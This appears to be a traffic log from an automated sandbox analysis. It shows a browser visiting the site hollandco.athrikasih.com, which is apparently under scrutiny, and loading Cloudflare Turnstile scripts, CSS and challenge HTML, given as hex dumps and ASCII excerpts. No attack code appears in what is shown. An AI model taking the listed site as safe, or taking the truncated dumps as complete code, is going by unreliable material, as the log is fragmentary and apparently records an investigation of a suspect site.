                                                                                                        2024-10-04 13:11:20 UTC977INData Raw: 20 62 72 65 61 6b 2d 77 6f 72 64 3b 20 2f 2a 20 42 72 65 61 6b 20 6c 6f 6e 67 20 77 6f 72 64 73 20 69 66 20 6e 65 63 65 73 73 61 72 79 20 2a 2f 0a 7d 0a 0a 2f 2a 20 41 64 64 20 72 65 73 70 6f 6e 73 69 76 65 20 73 74 79 6c 69 6e 67 20 66 6f 72 20 73 6d 61 6c 6c 65 72 20 73 63 72 65 65 6e 73 20 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 20 7b 0a 20 20 20 20 2e 6c 61 73 74 6d 65 73 73 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 20 2f 2a 20 4f 70 74 69 6f 6e 61 6c 3a 20 41 64 6a 75 73 74 20 66 6f 6e 74 20 73 69 7a 65 20 6f 6e 20 73 6d 61 6c 6c 65 72 20 73 63 72 65 65 6e 73 20 2a 2f 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 20 2f 2a 20 41
                                                                                                        Data Ascii: break-word; /* Break long words if necessary */}/* Add responsive styling for smaller screens */@media (max-width: 480px) { .lastmessage { font-size: 12px; /* Optional: Adjust font size on smaller screens */ line-height: 1.4; /* A


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.1649718104.18.95.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:21 UTC552OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://hollandco.athrikasih.com/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:21 UTC356INHTTP/1.1 302 Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:21 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        access-control-allow-origin: *
                                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56ad69f0a4249-EWR


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.1649720104.18.95.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:21 UTC567OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://hollandco.athrikasih.com/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:22 UTC441INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:21 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47262
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56ada6ffa72b6-EWR
                                                                                                        2024-10-04 13:11:22 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                        Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                        Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                        Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                        Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                        Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                        Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                        Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                        Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                        Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.1649722104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:22 UTC807OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                        Referer: https://hollandco.athrikasih.com/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:22 UTC1369INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:22 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 164980
                                                                                                        Connection: close
                                                                                                        origin-agent-cluster: ?1
                                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                        cross-origin-opener-policy: same-origin
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        referrer-policy: same-origin
                                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        cross-origin-embedder-policy: require-corp
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        document-policy: js-profiling
                                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                        2024-10-04 13:11:22 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 64 35 36 61 64 66 31 65 34 63 37 63 65 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8cd56adf1e4c7ce7-EWR
                                                                                                        2024-10-04 13:11:22 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                        Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                        Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                        Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
